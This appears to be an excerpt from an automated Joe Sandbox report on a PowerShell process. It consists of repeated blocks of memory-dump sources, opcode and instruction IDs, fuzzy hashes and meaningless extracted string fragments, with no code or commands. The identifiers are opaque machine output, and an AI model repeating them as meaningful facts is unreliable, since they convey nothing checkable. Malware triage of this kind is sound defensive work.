                                                            • Opcode ID: 4c45cfa99e238db67129d0287984f97cb2ddb20792ea91b22ac457681bc4e81b
                                                            • Instruction ID: e367924e6a1f9c178f3d8e62c29488036235cdebcb4c2e8dc91e84d5a6eff2fa
                                                            • Opcode Fuzzy Hash: 4c45cfa99e238db67129d0287984f97cb2ddb20792ea91b22ac457681bc4e81b
                                                            • Instruction Fuzzy Hash: 46712971E00228CFEB64DF6AC950AD9B7B2FF89300F1082AAD509A7350DB345E85CF91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454308070.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6be0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (bq
                                                            • API String ID: 0-149360118
                                                            • Opcode ID: dbd04a79b596b7c9f204bcfccd45ae470b2ee5776fa4b19618c50cba24737d00
                                                            • Instruction ID: 67cb86eb397cf99ed60e3bd317b53941592c8f8e6d17d40b15c5324e4c80ee1f
                                                            • Opcode Fuzzy Hash: dbd04a79b596b7c9f204bcfccd45ae470b2ee5776fa4b19618c50cba24737d00
                                                            • Instruction Fuzzy Hash: 6D327AB1B006158FCB59DFA9C894A6EFBF2FF88300F248569D55AD7391DB34A901CB90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Te^q
                                                            • API String ID: 0-671973202
                                                            • Opcode ID: 157d2a930ce55c6f483b290d8e54e9a8f539bc361e58b2ad14e12a96d98f8586
                                                            • Instruction ID: 288e578301a9b0efe6c69ea3eaa82be9206f32b5386d167bdc9f85df1161ec43
                                                            • Opcode Fuzzy Hash: 157d2a930ce55c6f483b290d8e54e9a8f539bc361e58b2ad14e12a96d98f8586
                                                            • Instruction Fuzzy Hash: 60121770A45218CFEB64DF69D944BA9BBF2FB8D300F1085AAE409A7395DB345E81CF50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454830630.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c40000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Ednc
                                                            • API String ID: 0-3985990180
                                                            • Opcode ID: 44af466a3d5820c720a2ba32c59c8b488ef97a495881ba4ba72b19a82bf28c50
                                                            • Instruction ID: c6c1f68ae21d57f42abd126f0c10ffe0434142cd29fbaa85e01e7364f899577b
                                                            • Opcode Fuzzy Hash: 44af466a3d5820c720a2ba32c59c8b488ef97a495881ba4ba72b19a82bf28c50
                                                            • Instruction Fuzzy Hash: 5512B370E006588FDB54DFAAC98069DFBF2BF89304F24C169D419EB21ADB34A946CF54
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454217387.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bd0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Te^q
                                                            • API String ID: 0-671973202
                                                            • Opcode ID: 0900f62bfe7908bc58d57527eca3803e5918902489128a1d8e756a18b2683434
                                                            • Instruction ID: 0ed0386012890d0c722f0e91f64c479205e2ef42ae9fbda5e08b37d229a6c67f
                                                            • Opcode Fuzzy Hash: 0900f62bfe7908bc58d57527eca3803e5918902489128a1d8e756a18b2683434
                                                            • Instruction Fuzzy Hash: 2CC149B0E05218CFEB64DFA9D944B9DBBF2FB89304F1081A9E408AB351EB745985CF40
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454830630.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c40000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: D
                                                            • API String ID: 0-2746444292
                                                            • Opcode ID: 36b1adf922191185c79cbebe4f4a912edaf1538acc06dfc5ec793867bae3220d
                                                            • Instruction ID: 616f6c6a4805e9983b8a3109a683fae564cbec1ebaa2517126049c68aaeffb88
                                                            • Opcode Fuzzy Hash: 36b1adf922191185c79cbebe4f4a912edaf1538acc06dfc5ec793867bae3220d
                                                            • Instruction Fuzzy Hash: D0415A71E016588FEB58DF6BCD4479EFAF3AFC9201F14C1BA941CAA255DB344A868F01
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454830630.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c40000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (
                                                            • API String ID: 0-3887548279
                                                            • Opcode ID: ef1e3db529e433769687fb225321c1790b07e86b9e231d3755497ed6ec8d6640
                                                            • Instruction ID: b62b7a3912113b5cf43d129782eb98b8aea225a42b9c6165363c01dda557ed89
                                                            • Opcode Fuzzy Hash: ef1e3db529e433769687fb225321c1790b07e86b9e231d3755497ed6ec8d6640
                                                            • Instruction Fuzzy Hash: 3741AD71D057588FD75ACF2B8C40289BBF7AFCA200F19C0EAD5489B265DB744A4ACF11
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454830630.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c40000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: L
                                                            • API String ID: 0-2909332022
                                                            • Opcode ID: e6b89ed7b645a71c74decfdc6a51a6abf0e18c446897ebcd2955f1feb33955c8
                                                            • Instruction ID: fc3a2628fc22cfbad9998e3bee54736f273031453cc8795485dfc09bb08a3c62
                                                            • Opcode Fuzzy Hash: e6b89ed7b645a71c74decfdc6a51a6abf0e18c446897ebcd2955f1feb33955c8
                                                            • Instruction Fuzzy Hash: A9319DB1E056188FEB5DDF6B8C4129AFAFBAFC9304F04D0FA954CA6215DB7406858F10
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454308070.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6be0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9d35f9436477670f28ba965770170e02abfd5e5f2469ff73b3c6e506fa37acf0
                                                            • Instruction ID: e69f262d3b3c004836f76cb26f668afdf169a37b9b6879b385fb084850dd0d9b
                                                            • Opcode Fuzzy Hash: 9d35f9436477670f28ba965770170e02abfd5e5f2469ff73b3c6e506fa37acf0
                                                            • Instruction Fuzzy Hash: 8BD16EB0E05208CFEB54DFA9C944BADBBF6FB89301F1091A9E509AB391DB345985CF40
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454308070.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6be0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cf710da73981b03ba940ebf7ed984404f5128044455f7a63c6efc981c1032f40
                                                            • Instruction ID: ce41b2a948907955707b255c5ce023c18b4d674c19dd41e95e42d10b910d8b54
                                                            • Opcode Fuzzy Hash: cf710da73981b03ba940ebf7ed984404f5128044455f7a63c6efc981c1032f40
                                                            • Instruction Fuzzy Hash: 75D15DB4E05208CFEB54DFA8D954BADBBF2FB89305F1081A9E509AB391DB345985CF40
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454975305.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 516a32531cae1e5b49218011a62ce7386fdb8f462d040371b6a79850f6ca6254
                                                            • Instruction ID: 17d54e8d29741eba0a93aa4195b17cae57161ee45ad0bc43e48454e706ce7206
                                                            • Opcode Fuzzy Hash: 516a32531cae1e5b49218011a62ce7386fdb8f462d040371b6a79850f6ca6254
                                                            • Instruction Fuzzy Hash: 20A13A70A04208CFEB84DFAAD694BADBBF2FB89301F108229E505B73A1DB745945CF54
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454975305.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 41198c6aa3903c0550b113b833660aa1a94c893a6a879a5c716640493e521834
                                                            • Instruction ID: f8f0201e320198cbec53075cd8b371e740c534748b7f50b2d07ad7cf9d076fbb
                                                            • Opcode Fuzzy Hash: 41198c6aa3903c0550b113b833660aa1a94c893a6a879a5c716640493e521834
                                                            • Instruction Fuzzy Hash: E8A13D70A04208CFEB84DFAAD694BADBBF2FB89301F508229F505B72A1DB745945CF54
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454308070.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6be0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9f0c9b00273bc897bafe2584f565c5ff79efec30940cc6783d3a870b19a656e5
                                                            • Instruction ID: 4b0091069a9a6db87dd89ada04a3bdc993025ce4a648c3d98a4d9065312d7f4c
                                                            • Opcode Fuzzy Hash: 9f0c9b00273bc897bafe2584f565c5ff79efec30940cc6783d3a870b19a656e5
                                                            • Instruction Fuzzy Hash: D6516CB4D16208CFEB54CFA9D544BEDBBF2FBAA300F10916AE409A7291E7345946CF40
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454308070.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6be0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a821d13ef29547fecfa2952793666d9e1e5432cf8b868b54261daf1041203f4d
                                                            • Instruction ID: e18acb5a970c7befc2a7e443cfea0f168758a000239e7078d1cc1260cafbcd43
                                                            • Opcode Fuzzy Hash: a821d13ef29547fecfa2952793666d9e1e5432cf8b868b54261daf1041203f4d
                                                            • Instruction Fuzzy Hash: BF5169B4D16208CFEB44DFA9D644BADBBF2FBAA301F10916AE409A7351EB345941CF40
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454830630.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c40000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 84642cf58472ce5761406e2023e6ec4f6733a66d838ed80a8ad1e2a447e02403
                                                            • Instruction ID: 9e837b59074228c8c3e69826b939340230852126addecf0ce1d7f911deb58633
                                                            • Opcode Fuzzy Hash: 84642cf58472ce5761406e2023e6ec4f6733a66d838ed80a8ad1e2a447e02403
                                                            • Instruction Fuzzy Hash: F9518671E016189BDB58DFABD94059EFBF3AFC9300F14C16AD848AB225EB7059468F50
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 72a610ef5c80a53869eb2c03bb9f393709f7f18be8c8c9a2a0e15fcd3219ea10
                                                            • Instruction ID: b81943782575dddee3aa8b4c367e70333b453b2f0444944ffb39ab243575eb48
                                                            • Opcode Fuzzy Hash: 72a610ef5c80a53869eb2c03bb9f393709f7f18be8c8c9a2a0e15fcd3219ea10
                                                            • Instruction Fuzzy Hash: AA51B971E10A188BEB18CF6BDD4469ABBF3BFC8301F14C1A9D409AB295DB745A81CF50
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 70dd716a4779f460e154537b72e66cd6f96626f81ea44e52f532c4aa27289a54
                                                            • Instruction ID: 30c651f8d36e9156efa04107574e7ad25755a990b2885656d13a714a0145f147
                                                            • Opcode Fuzzy Hash: 70dd716a4779f460e154537b72e66cd6f96626f81ea44e52f532c4aa27289a54
                                                            • Instruction Fuzzy Hash: FA519670D05658CFEB68DF6AC95879ABBF2BF88305F14C1E9C409A72A4DB744A85CF40
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454308070.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6be0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7d5837a35dead27b3daaeac141cdbcb6d17a226fc3d2127876032004b8461643
                                                            • Instruction ID: 5e87de814eeaa2c4fbb51d3e4def7920e45409edb43ddf2db4f422b8b22f479c
                                                            • Opcode Fuzzy Hash: 7d5837a35dead27b3daaeac141cdbcb6d17a226fc3d2127876032004b8461643
                                                            • Instruction Fuzzy Hash: 034159B4D16208CFEB54DFE9D644BADBBF2FBAA301F10916AE409A7261E7345941CF40
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454830630.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c40000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 139762c32a3948b6bc924f15f39e990552772161190f806657ef6f144a391d65
                                                            • Instruction ID: dc0b850878adf9fc8c94ec07a54190ffd65bdd3486d5139378f431e381287a90
                                                            • Opcode Fuzzy Hash: 139762c32a3948b6bc924f15f39e990552772161190f806657ef6f144a391d65
                                                            • Instruction Fuzzy Hash: CD416E71D016199FEB58DF6BC84069AFBF3AFC9300F14C1BAD419AA254EB3549468F50
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2422970271.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_8e0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5f120690759c773fe27c42e21d04597c21a51b444d046d8a64a30451ba11fc2f
                                                            • Instruction ID: d7311383c5c25f9eeaf29f788d2532b02d3b7f2084210f60880bb9e8d957b61e
                                                            • Opcode Fuzzy Hash: 5f120690759c773fe27c42e21d04597c21a51b444d046d8a64a30451ba11fc2f
                                                            • Instruction Fuzzy Hash: 91513171D056688BEB2CCF2B8D456CAFAF7BFC9300F14C1FA954CA6254DB700A828E41
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2422970271.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_8e0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8957e68dbec0fc23c2ae5a3de4ea54406a244be54048bd5d3b1d2601155e4fdf
                                                            • Instruction ID: 46bd6ed8896df0b7c45cd245efcb14c8f768bb7061f6e9ca67cd36284d6c7aa1
                                                            • Opcode Fuzzy Hash: 8957e68dbec0fc23c2ae5a3de4ea54406a244be54048bd5d3b1d2601155e4fdf
                                                            • Instruction Fuzzy Hash: 9B511471D056588BEB2DCF6B8D452CAFAF3AFC9300F04C1F9955CA6264DB740A868F51
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 08ba1d4c10f02e77ffac7fbd2ffb0ea06c3a9c1a6b856654a28e7f99806c19c1
                                                            • Instruction ID: 257a12f15f0f06f40f44d36a421aaa195ae55a8173f71ecb134f186386bb6e41
                                                            • Opcode Fuzzy Hash: 08ba1d4c10f02e77ffac7fbd2ffb0ea06c3a9c1a6b856654a28e7f99806c19c1
                                                            • Instruction Fuzzy Hash: 3C41D870D056588FEB59CF6B894478AFFF3AF89314F18C1EAC448AA265DB740986CF11
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454603326.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c10000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cb431dad73c1f1ae5dc188f1082bae4422ff2cf5ad9f8a39d675078508141c23
                                                            • Instruction ID: 94876a9eae0e59269de0c5beaec2edf10fb98f3acd993c6e5dda063d40aa7aad
                                                            • Opcode Fuzzy Hash: cb431dad73c1f1ae5dc188f1082bae4422ff2cf5ad9f8a39d675078508141c23
                                                            • Instruction Fuzzy Hash: BF21FBB0E056188FEB58CF9AC9443DEFBF7AF89300F14C0A9D409AA254DB740A85DF41
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454603326.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c10000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d83debbb7a980f11950c249082b363d5f2390290d7e8d3e1c9af179fa8587019
                                                            • Instruction ID: 81ae79f456c643b6a3c6d804215997229569fe28ceabf26117e398c2791d9756
                                                            • Opcode Fuzzy Hash: d83debbb7a980f11950c249082b363d5f2390290d7e8d3e1c9af179fa8587019
                                                            • Instruction Fuzzy Hash: 72213E70E066189BEB58CF5BD9403DEFBF7AFC9300F04C06AD408AA254DB34094A8F50
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454308070.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6be0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 99f925da7807842d31aa18c2605085b79c88f4ad407e561857e07fbd84465a91
                                                            • Instruction ID: 9d5f3c56c27fcb4df03df6f666ca738b5daac43ee2db15f86fdb6c0b60197ea7
                                                            • Opcode Fuzzy Hash: 99f925da7807842d31aa18c2605085b79c88f4ad407e561857e07fbd84465a91
                                                            • Instruction Fuzzy Hash: 8801A970A0D726DFE399DF78D8E18EA7360FF412293A540BFC80289805E775981BCE80
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454308070.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6be0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3e6c0cb56b5b0e453cf2a0b14f27be5ba7ac281e8711d75e13f0dffe5f1b4d39
                                                            • Instruction ID: fb5b8b6ea1aef9001a70814b2b03de81a64b19d98635c6405ea944b0829c6260
                                                            • Opcode Fuzzy Hash: 3e6c0cb56b5b0e453cf2a0b14f27be5ba7ac281e8711d75e13f0dffe5f1b4d39
                                                            • Instruction Fuzzy Hash: 17D0127451A32A9FE3569F7594834EAB3B0FD01668712A07FC10189411EB7494179EC0
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454308070.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6be0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fb2476b0c9a4af92bca5f3696d75896ffd46d68361dbff8066a4d76c3915ba2f
                                                            • Instruction ID: 461e12c50f10c3c6c2b572f17bc8e65da02ee88f63fd03da767063d85e857f1a
                                                            • Opcode Fuzzy Hash: fb2476b0c9a4af92bca5f3696d75896ffd46d68361dbff8066a4d76c3915ba2f
                                                            • Instruction Fuzzy Hash: A2C08CB092B3268F93D06E1A95570FAF3A0A882565A12F43FC20184800A734949A5EC0
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454308070.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6be0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b2106ea2f1bec4d33f7c85eb73031605f06b5b811ae4f317341248c65f3f1dad
                                                            • Instruction ID: d198a1f95db3e6405221e7abbe0f4798be6f3be71bcea96776107a09f8919cfa
                                                            • Opcode Fuzzy Hash: b2106ea2f1bec4d33f7c85eb73031605f06b5b811ae4f317341248c65f3f1dad
                                                            • Instruction Fuzzy Hash: ECC08C30A0A326AFD7848E2382A32EFF3F0AE10624322923FE402004409B39242B7E00
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458981961.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_72c0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .$4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
                                                            • API String ID: 0-1341042235
                                                            • Opcode ID: 1c4dd2acb8224b6d84ea7a4d8542ca60c02601e95a5f167cca58396431476321
                                                            • Instruction ID: 619908eac6284802a6dcd69c8686e31363fc4441c445562f3c1c0c0d859fec22
                                                            • Opcode Fuzzy Hash: 1c4dd2acb8224b6d84ea7a4d8542ca60c02601e95a5f167cca58396431476321
                                                            • Instruction Fuzzy Hash: 1CF167B1724347CFDB24CA298C0077ABBA2AFE5610F1886BED505CF355DA32D945C7A2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7190000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                            • API String ID: 0-3732357466
                                                            • Opcode ID: 72572381a2c29de48303f7f262761e6b8fceea70b77976c7cfa4e89f8edac8d1
                                                            • Instruction ID: 1318ab26404747dcf565861f431b9991b7341781f1dbe8178697c09b46bb6d61
                                                            • Opcode Fuzzy Hash: 72572381a2c29de48303f7f262761e6b8fceea70b77976c7cfa4e89f8edac8d1
                                                            • Instruction Fuzzy Hash: 6951F5B5B0020ADFDF2D8E29D8446AAB7E6ABC5250F14847ED4058F295DF31E847CB92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7190000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$tP^q$$^q$$^q$$^q$$^q$$^q
                                                            • API String ID: 0-1644488550
                                                            • Opcode ID: 2e58f62eb3d2c8e8589fcc35377b136224bc6344a46f2c2ac41e2f94e6745834
                                                            • Instruction ID: 6c135ab55afc3f2ea26b9fd1573ebad659e9cc68114bfdbfb825a1ac05f230a8
                                                            • Opcode Fuzzy Hash: 2e58f62eb3d2c8e8589fcc35377b136224bc6344a46f2c2ac41e2f94e6745834
                                                            • Instruction Fuzzy Hash: 8551A1B0A00206DFDF2ACE55C644B6AB7F2AB85750F5A8076D8059F2D5C731DC46CBB1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454217387.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bd0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (bq$4'^q$4'^q$4'^q$4'^q$pbq
                                                            • API String ID: 0-723292480
                                                            • Opcode ID: 11fa0d95df9340f1b5c5ec78c5f3b91ce43ca74f26b8e1589a6df7e2f6feeb8e
                                                            • Instruction ID: ba3a6111942539f6f769bd8f15f623422df26d71de583d5d66022c71f051d224
                                                            • Opcode Fuzzy Hash: 11fa0d95df9340f1b5c5ec78c5f3b91ce43ca74f26b8e1589a6df7e2f6feeb8e
                                                            • Instruction Fuzzy Hash: 3FD14D76900118DFCB45DFA4C944D99BBB2FF88310F0584E8E609AB276DB32ED56DB90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458981961.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_72c0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q
                                                            • API String ID: 0-1041444323
                                                            • Opcode ID: 0024e13749b5f322a76730e7e99128e14370bbea97c255937ea8a36bcecd37a8
                                                            • Instruction ID: 70e8f2af948814bcd0de66171aec92c7c8aab0667b299b42c3d22686e79767d7
                                                            • Opcode Fuzzy Hash: 0024e13749b5f322a76730e7e99128e14370bbea97c255937ea8a36bcecd37a8
                                                            • Instruction Fuzzy Hash: 10115CB1B69347CFCB3D95782C2412A6AE76FE1950729466FC040CF35ADF628C4A8383
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458981961.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_72c0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$Pq^q
                                                            • API String ID: 0-653376292
                                                            • Opcode ID: 319fa4bb2f965dfa8258abb137f73433e153b34bf6f11baf2bc442ed67e23a4e
                                                            • Instruction ID: 4b887adcb27ce72b5c6187bd4fb7a3b7c47b872a5b7fb7e4184b0008c594c19a
                                                            • Opcode Fuzzy Hash: 319fa4bb2f965dfa8258abb137f73433e153b34bf6f11baf2bc442ed67e23a4e
                                                            • Instruction Fuzzy Hash: 38227174B102158FCB24DB19C950B9ABBB2EF98300F54C5E9D409AF355DB71ED868F81
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458981961.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_72c0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                            • API String ID: 0-3272787073
                                                            • Opcode ID: f2a75461623fa7789ca5b8bcb3494a73a11ddc83aff7ce8281e24ab03c461001
                                                            • Instruction ID: 06802e82c3e55635e4af2337456da3569bdf0e389fa249e7b8ee9ed362a5edce
                                                            • Opcode Fuzzy Hash: f2a75461623fa7789ca5b8bcb3494a73a11ddc83aff7ce8281e24ab03c461001
                                                            • Instruction Fuzzy Hash: 8BA149B1B2435ACFDB20CA699C0066ABBA5EFA5210F18857FD905CB345DF32D845C7A2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
